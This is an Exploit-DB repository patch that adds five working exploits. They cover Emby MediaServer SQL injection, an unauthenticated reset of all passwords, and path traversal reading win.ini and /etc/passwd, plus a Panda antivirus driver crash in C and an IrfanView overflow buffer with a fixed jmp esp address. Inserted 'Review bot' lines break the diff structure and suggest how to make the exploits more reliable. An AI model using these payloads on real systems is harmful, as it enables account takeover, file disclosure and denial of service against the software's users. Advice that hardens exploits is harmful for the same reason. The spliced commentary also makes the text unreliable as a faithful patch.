From e4147fb21ea68ad96022ff768073b61e94ba0ae9 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 1 May 2017 05:01:18 +0000
Subject: [PATCH] DB: 2017-05-01

5 new exploits

Panda Free Antivirus - 'PSKMAD.sys' Denial of Service
IrfanView 4.44 - Denial of Service
Emby MediaServer 3.2.5 - SQL Injection
Emby MediaServer 3.2.5 - Password Reset
Emby MediaServer 3.2.5 - Directory Traversal
---
 files.csv | 5 +
 platforms/multiple/webapps/41946.txt | 66 +++++++++++
 platforms/multiple/webapps/41947.txt | 166 +++++++++++++++++++++++++++
 platforms/multiple/webapps/41948.txt | 157 +++++++++++++++++++++++++
 platforms/windows/dos/41945.c | 89 ++++++++++++++
 platforms/windows/dos/41949.py | 30 +++++
 6 files changed, 513 insertions(+)
 create mode 100755 platforms/multiple/webapps/41946.txt
 create mode 100755 platforms/multiple/webapps/41947.txt
 create mode 100755 platforms/multiple/webapps/41948.txt
 create mode 100755 platforms/windows/dos/41945.c
 create mode 100755 platforms/windows/dos/41949.py

diff --git a/files.csv b/files.csv
index cc2ae02c5..4ae3b17d3 100644
--- a/files.csv
+++ b/files.csv
@@ -5479,6 +5479,8 @@ id,file,description,date,author,platform,type,port
 41931,platforms/multiple/dos/41931.html,"Apple Safari - Array concat Memory Corruption",2017-04-25,"Google Security Research",multiple,dos,0
 41932,platforms/multiple/dos/41932.cpp,"Oracle VirtualBox Guest Additions 5.1.18 - Unprivileged Windows User-Mode Guest Code Double-Free",2017-04-25,"Google Security Research",multiple,dos,0
 41941,platforms/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos,0
+41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
+41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -37794,3 +37796,6 @@ id,file,description,date,author,platform,type,port
 41940,platforms/php/webapps/41940.py,"TYPO3 News Module - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80
 41943,platforms/php/webapps/41943.py,"Simple File Uploader - Arbitrary File Download",2017-04-27,"Daniel Godoy",php,webapps,0
 41944,platforms/php/webapps/41944.txt,"Easy File Uploader - Arbitrary File Upload",2017-04-27,"Daniel Godoy",php,webapps,0
+41946,platforms/multiple/webapps/41946.txt,"Emby MediaServer 3.2.5 - SQL Injection",2017-04-30,LiquidWorm,multiple,webapps,0
+41947,platforms/multiple/webapps/41947.txt,"Emby MediaServer 3.2.5 - Password Reset",2017-04-30,LiquidWorm,multiple,webapps,0
+41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0
diff --git a/platforms/multiple/webapps/41946.txt b/platforms/multiple/webapps/41946.txt
new file mode 100755
index 000000000..44eeb0178
--- /dev/null
+++ b/platforms/multiple/webapps/41946.txt
@@ -0,0 +1,66 @@ +Emby MediaServer 3.2.5 Boolean-based Blind SQL Injection Vulnerability + + +Vendor: Emby LLC +Product web page: https://www.emby.media +Affected version: 3.2.5 + 3.1.5 + 3.1.2 + 3.1.1 + 3.1.0 + 3.0.0 + +Summary: Emby (formerly Media Browser) is a media server designed to organize, +play, and stream audio and video to a variety of devices. Emby is open-source, +and uses a client-server model. Two comparable media servers are Plex and Windows +Media Center. + +Desc: Emby suffers from a blind SQL injection vulnerability. Input passed via the GET +parameter 'MediaTypes' is not properly sanitised before being returned to the user +or used in SQL queries. This can be exploited to manipulate SQL queries by injecting +arbitrary SQL code. + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50 + Ubuntu Linux 14.04.5 + MacOS Sierra 10.12.3 + SQLite3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5400 +Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5400.php + +SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098 + + +22.12.2016 + +-- + + +PoC: + +GET /emby/Users/abb355429db54e159ac2a7a3cbd6eb12/Items?ParentId=4cd160cad6c50f34ca42be0136af2316&Filters=IsNotFolder&Recursive=true&SortBy=SortName&MediaTypes=Audio%2cVideo'&Limit=100&Fields=MediaSources%2CChapters&ExcludeLocationTypes=Virtual HTTP/1.1 +Host: 10.211.55.3:8096 +accept: application/json +x-mediabrowser-token: ba5a68dfa1134bd6af642228bbf757bb +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 +x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome 55.0.2883.87", DeviceId="104a154d5aa8c9576a2508113b47a53b6170253c", Version="3.1.0.0", UserId="abb355429db54e159ac2a7a3cbd6eb12" +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8 +Connection: close + +Response: + +HTTP/1.1 500 
Internal Server Error +Content-Type: text/html +Server: Mono-HTTPAPI/1.0 +Date: Tue, 21 Feb 2017 12:06:09 GMT +Content-Length: 64 +Connection: close + +Exception of type 'SQLitePCL.pretty.SQLiteException' was thrown. diff --git a/platforms/multiple/webapps/41947.txt b/platforms/multiple/webapps/41947.txt new file mode 100755 index 000000000..18cdf66ae --- /dev/null +++ b/platforms/multiple/webapps/41947.txt 
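Review bot: The PoC demonstrates only an error-based signal — the stray quote in `MediaTypes=Audio%2cVideo'` produces a 500 carrying `SQLitePCL.pretty.SQLiteException` — which proves that unsanitised input reaches SQLite but does not by itself show the boolean-based blind condition the title claims; a request pair such as `MediaTypes=Audio' AND '1'='1` versus `MediaTypes=Audio' AND '1'='2` with observably different 200 responses would make the advisory match its title. The request also carries a valid `x-mediabrowser-token` and targets a user-scoped `/emby/Users/<id>/Items` path, so as written this is a post-authentication issue, and the Desc should state that rather than only "not properly sanitised". The `Tested on` block lists `Mono-HTTPAPI/1.1` while the captured response reports `Server: Mono-HTTPAPI/1.0`, which suggests the capture came from a different build than the one described; the two should be reconciled so a reader knows which version the 500 was observed on.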
@@ -0,0 +1,166 @@ +Emby MediaServer 3.2.5 Password Reset Vulnerability + + +Vendor: Emby LLC +Product web page: https://www.emby.media +Affected version: 3.2.5 + 3.1.5 + 3.1.2 + 3.1.1 + 3.1.0 + 3.0.0 + +Summary: Emby (formerly Media Browser) is a media server designed to organize, +play, and stream audio and video to a variety of devices. Emby is open-source, +and uses a client-server model. Two comparable media servers are Plex and Windows +Media Center. + +Desc: The issue can be triggered by an unauthenticated actor within the home network +(LAN) only. The attacker doesn't need to specify a valid username to reset the +password. He or she can enter a random string, and using the file disclosure issue +it's possible to read the PIN needed for resetting. This in turn will disclose all +the valid usernames in the emby server and reset all the passwords for all the users +with a blank password. Attackers can exploit this to gain unauthenticated and unauthorized +access to the emby media server management interface. + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50 + Ubuntu Linux 14.04.5 + MacOS Sierra 10.12.3 + SQLite3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5401 +Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5401.php + +SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098 + + +22.12.2016 + +-- + + +1. First we initiate the Forgot Password feature from within our home network: +------------------------------------------------------------------------------ + +http://10.211.55.3:8096/web/forgotpassword.html + + +2. 
Then, we type any random username and hit submit: +---------------------------------------------------- + +POST /emby/Users/ForgotPassword HTTP/1.1 +Host: 10.211.55.3:8096 +Connection: keep-alive +Content-Length: 32 +accept: application/json +Origin: http://10.211.55.3:8096 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 +x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0" +content-type: application/x-www-form-urlencoded; charset=UTF-8 +Referer: http://10.211.55.3:8096/web/forgotpassword.html +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8,mk;q=0.6 +DNT: 1 + +EnteredUsername=RandomusUsuarius + + + +3. You will get an alert message (Windows/Linux): +------------------------------------------------- + +The following file has been created on your server and contains instructions on how to proceed: + +C:\Users\lqwrm\AppData\Roaming\\Emby-Server\passwordreset.txt + +-- OR -- + +/var/lib/emby-server/passwordreset.txt + + +4. 
Exploiting the file disclosure vulnerability (ZSL-2017-5403): +---------------------------------------------------------------- + +GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\lqwrm\AppData\Roaming\Emby-Server\passwordreset.txt HTTP/1.1 +Host: 10.211.55.3:8096 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8 +Connection: close + +HTTP/1.1 200 OK +X-UA-Compatible: IE=Edge +Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization +Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS +Access-Control-Allow-Origin: * +Vary: Accept-Encoding +ETag: "c4fd834ac2fc99ff99d74c8e994a8a71" +Cache-Control: public +Expires: -1 +Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50 +Content-Type: text/plain +Date: Tue, 28 Feb 2017 12:14:51 GMT +Content-Length: 164 +Connection: close + +Use your web browser to visit: + +http://10.211.55.3:8096/web/forgotpasswordpin.html + +Enter the following pin code: + +6727 + +The pin code will expire at 91 + + + +5. 
Following the instructions, entering the PIN, results in resetting all the passwords for all the emby users on the system: +----------------------------------------------------------------------------------------------------------------------------- + +POST /emby/Users/ForgotPassword/Pin HTTP/1.1 +Host: 10.211.55.3:8096 +Connection: keep-alive +Content-Length: 9 +accept: application/json +Origin: http://10.211.55.3:8096 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 +x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0" +content-type: application/x-www-form-urlencoded; charset=UTF-8 +Referer: http://10.211.55.3:8096/web/forgotpasswordpin.html +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8,mk;q=0.6 +DNT: 1 + +Pin=6272 + +--- + +We get the message: + +Passwords have been removed for the following users. To login, sign in with a blank password. + +testingus +test321 +beebee +admin +ztefan +lio +miko +dni +embyusertest +joxypoxy +test123 +thricer +teppei +admin2 +delf1na + diff --git a/platforms/multiple/webapps/41948.txt b/platforms/multiple/webapps/41948.txt new file mode 100755 index 000000000..ecf956b43 --- /dev/null +++ b/platforms/multiple/webapps/41948.txt 
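Review bot: The PIN disclosed in step 4 is `6727`, but the step-5 request submits `Pin=6272`, so the chain as transcribed cannot yield the success message shown; one of the two values should be corrected so the PoC is reproducible. Step 4 depends on ZSL-2017-5403 and, on Windows, on knowing the service account's profile name (`C:\Users\lqwrm\...`), whereas the Linux path `/var/lib/emby-server/passwordreset.txt` is fixed; the Desc should say that the Windows variant needs that name (it can presumably be recovered through the same traversal, but the advisory does not show how). Both POSTs are sent without any `x-mediabrowser-token`, and the `ForgotPassword/Pin` step blanks every account including `admin`, so the impact statement should say plainly that one unauthenticated LAN-reachable request pair removes administrator credentials; the "LAN only" framing rests on the server's own reachability and is not shown to be enforced by the endpoint.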
@@ -0,0 +1,157 @@ +Emby MediaServer 3.2.5 Directory Traversal File Disclosure Vulnerability + + +Vendor: Emby LLC +Product web page: https://www.emby.media +Affected version: 3.2.5 + 3.1.5 + 3.1.2 + 3.1.1 + 3.1.0 + 3.0.0 + +Summary: Emby (formerly Media Browser) is a media server designed to organize, +play, and stream audio and video to a variety of devices. Emby is open-source, +and uses a client-server model. Two comparable media servers are Plex and Windows +Media Center. + +Desc: The vulnerability was confirmed on tested platforms depending on the version. +Version 3.1.0 is affecting Linux, Windows and Mac platforms. The 3.2.5 only affects +Windows release. Input passed via the 'swagger-ui' object in SwaggerService.cs is not +properly verified before being used to load resources. This can be exploited to disclose +the contents of arbitrary files via directory traversal attacks. + +================================================================================ +/Emby.Server.Implementations/HttpServer/SwaggerService.cs: +---------------------------------------------------------- + +using MediaBrowser.Controller; +using MediaBrowser.Controller.Net; +using System.IO; +using MediaBrowser.Model.IO; +using MediaBrowser.Model.Services; + +namespace Emby.Server.Implementations.HttpServer +{ + public class SwaggerService : IService, IRequiresRequest + { + private readonly IServerApplicationPaths _appPaths; + private readonly IFileSystem _fileSystem; + + public SwaggerService(IServerApplicationPaths appPaths, IFileSystem fileSystem, IHttpResultFactory resultFactory) + { + _appPaths = appPaths; + _fileSystem = fileSystem; + _resultFactory = resultFactory; + } + + /// + /// Gets the specified request. + /// + /// The request. + /// System.Object. 
+ public object Get(GetSwaggerResource request) + { + var swaggerDirectory = Path.Combine(_appPaths.ApplicationResourcesPath, "swagger-ui"); + + var requestedFile = Path.Combine(swaggerDirectory, request.ResourceName.Replace('/', _fileSystem.DirectorySeparatorChar)); + + return _resultFactory.GetStaticFileResult(Request, requestedFile).Result; + } + + /// + /// Gets or sets the result factory. + /// + /// The result factory. + private readonly IHttpResultFactory _resultFactory; + + /// + /// Gets or sets the request context. + /// + /// The request context. + public IRequest Request { get; set; } + } +} + +================================================================================ + + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50 + Ubuntu Linux 14.04.5 + MacOS Sierra 10.12.3 + SQLite3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5403 +Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5403.php + +SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098 + + +22.12.2016 + +-- + + +GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 + +HTTP/1.1 200 OK +X-UA-Compatible: IE=Edge +Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization +Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS +Access-Control-Allow-Origin: * +Vary: Accept-Encoding +ETag: "07bec80f76d20d26dd300a855219d321" +Cache-Control: public +Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50 +Content-Type: application/octet-stream +Date: Thu, 22 Dec 2016 10:43:53 GMT +Content-Length: 403 +Connection: close + +; for 16-bit app support +[fonts] +[extensions] +[mci extensions] +[files] +[Mail] +MAPI=1 +[MCI Extensions.BAK] +3g2=MPEGVideo +3gp=MPEGVideo +3gp2=MPEGVideo +3gpp=MPEGVideo +aac=MPEGVideo +adt=MPEGVideo +adts=MPEGVideo +m2t=MPEGVideo +m2ts=MPEGVideo 
+m2v=MPEGVideo +m4a=MPEGVideo +m4v=MPEGVideo +mod=MPEGVideo +mov=MPEGVideo +mp4=MPEGVideo +mp4v=MPEGVideo +mts=MPEGVideo +ts=MPEGVideo +tts=MPEGVideo + +========================== + +On Linux: + +http://127.0.0.1/%2femby%2fswagger-ui%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +... +... diff --git a/platforms/windows/dos/41945.c b/platforms/windows/dos/41945.c new file mode 100755 index 000000000..6c4c18193 --- /dev/null +++ b/platforms/windows/dos/41945.c 
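Review bot: `SwaggerService.Get` builds `requestedFile` with `Path.Combine(swaggerDirectory, request.ResourceName.Replace('/', _fileSystem.DirectorySeparatorChar))` and never canonicalises or containment-checks the result, so `..` segments — and, on Windows, `\` separators that the replace does not touch, which is why the PoC uses `..\` — escape `swagger-ui`; the fix is to resolve and check before serving, e.g. `var full = Path.GetFullPath(requestedFile);` followed by `if (!full.StartsWith(swaggerDirectory + _fileSystem.DirectorySeparatorChar, StringComparison.OrdinalIgnoreCase)) /* return 404 */`, with the rejection expressed however the result factory reports not-found. The Desc names the "'swagger-ui' object" as the input, but the controlled value is the `ResourceName` route parameter; naming it correctly helps anyone grepping the source. The captured response also carries `Access-Control-Allow-Origin: *` and the request needs no token, so a web page loaded in a browser on the same network could presumably read these files cross-origin, which the sibling advisory's "home network only" scoping understates. The Linux PoC URL `http://127.0.0.1/%2femby%2fswagger-ui%2f...` omits the `:8096` port used everywhere else and percent-encodes the separators, so it is unclear whether that exact request or a decoded form returned `/etc/passwd`; the advisory should show the request as sent.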
@@ -0,0 +1,89 @@ +/* +# Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service +# Date: 2017-04-29 +# Exploit Author: Peter baris +# Vendor Homepage: http://www.saptech-erp.com.au +# Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en +# Version: 18.0 +# Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64 +# CVE : requested +*/ + +#include "stdafx.h" +#include +#include +#include + + +#define DEVICE_NAME L"\\\\.\\PSMEMDriver" + +LPCTSTR FileName = (LPCTSTR)DEVICE_NAME; +HANDLE GetDeviceHandle(LPCTSTR FileName) { + HANDLE hFile = NULL; + + hFile = CreateFile(FileName, + GENERIC_READ | GENERIC_WRITE, + 0, + 0, + OPEN_EXISTING, + NULL, + 0); + + return hFile; +} + +int main() +{ + + HANDLE hFile = NULL; + PVOID64 lpInBuffer = NULL; + ULONG64 lpBytesReturned; + PVOID64 BuffAddress = NULL; + SIZE_T BufferSize = 0x800; + + printf("Trying the get the handle for the PSMEMDriver device.\r\n"); + + hFile = GetDeviceHandle(FileName); + + if (hFile == INVALID_HANDLE_VALUE) { + printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError()); + return 1; + } + + // Allocate memory for our buffer + lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); + + + if (lpInBuffer == NULL) { + printf("VirtualAlloc() failed. \r\n"); + return 1; + } + + + BuffAddress = (PVOID64)(((ULONG64)lpInBuffer)); + *(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag??? 
+ BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4)); + *(PULONG64)BuffAddress = (ULONG64)0x42424242; + BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8)); + + RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41); + + + + DeviceIoControl(hFile, + 0xb3702c38, + lpInBuffer, + NULL, //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory + NULL, + NULL, + &lpBytesReturned, + NULL); + + /*This part is pretty much useless, just wanted to be nice in case the machine survives.*/ + printf("Cleaning up.\r\n"); + VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE); + CloseHandle(hFile); + printf("Resources freed up.\r\n"); + return 0; +} + diff --git a/platforms/windows/dos/41949.py b/platforms/windows/dos/41949.py new file mode 100755 index 000000000..c0009a5b0 --- /dev/null +++ b/platforms/windows/dos/41949.py @@ -0,0 +1,30 @@ +# Exploit Title: Irfanview - OtherExtensions Input Overflow +# Date: 29-04-2017 +# Software Link: http://download.cnet.com/IrfanView/?part=dl-&subj=dl&tag=button +# Exploit Author: Dreivan Orprecio +#Version: Irfanview 4.44 +#Irfanview is vulnerable to overflow in "OtherExtensions" input field +#Debugging Machine: WinXP Pro SP3 (32bit) + + +#POC + +#!usr/bin/python + + + eip = "\xf7\x56\x44\x7e" #jmp esp from user32.dll + + + + buffer = "OtherExtensions="+"A" * 199 + eip + "\xcc" + + print buffer #a) irfanview->Option->Properties/Settings->Extensions + #b) Paste the buffer in the "other" input then press ok, repeat a) and b) + + + + + +#badcharacters: those instruction that start with 6,7,8,E,F +#Only 43 bytes space to host a shellcode and lots of badchars make it hard for this to exploit +#Any other way around this? \ No newline at end of file
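Review bot: `VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE)` passes a non-zero size with `MEM_RELEASE`, which the API rejects (the size must be 0 for that flag), so "Resources freed up" prints after a failed release; it should read `VirtualFree(lpInBuffer, 0, MEM_RELEASE);`. `lpBytesReturned` is declared `ULONG64` but `DeviceIoControl` takes an `LPDWORD`, and the two tag writes through `PULONG64` each store 8 bytes at offsets 0 and 4, so the second clobbers the upper half of the first — the final layout is the intended pair of DWORDs only because of write order; `DWORD lpBytesReturned;` and writes through `PULONG` would say what is meant. The call passes `nInBufferSize` as `NULL` while the inline comment says to "change it to BufferSize" to get the buffer into the driver, so the file does not make clear whether the shipped parameters trigger the BSoD or only the debugging variant does; the header should state which. The three bare `#include` lines have lost their targets (presumably `<windows.h>` and `<stdio.h>`) somewhere in transcription, and `Vendor Homepage` points at `saptech-erp.com.au`, which is not the vendor of the product named in the title.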
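Review bot: `eip = "\xf7\x56\x44\x7e"` is a hard-coded `jmp esp` in user32.dll taken from the author's machine; user32 load addresses differ across XP service packs and language builds and are randomised on later Windows, so the comment should pin the build and warn that the gadget must be re-found, e.g. `#jmp esp from user32.dll on WinXP Pro SP3 32-bit (author's build) - re-locate on any other build`. The statements `eip =`, `buffer =` and `print buffer` appear with a leading space; if that indentation is really in the file, Python 2 aborts with `IndentationError: unexpected indent` before printing anything, so they should start at column 0. `print buffer` writes raw bytes such as 0xF7 and 0x7E to the console, and copying them through the console code page into the GUI field can alter them, so the usage note would serve readers better if it said to write the buffer to a file and paste from an editor that preserves bytes. The file is catalogued as a DoS, but a controlled EIP followed by a `\xcc` trap is a code-execution attempt, and the closing question about bad characters says the exploit is unfinished rather than merely a crash; the header should say so.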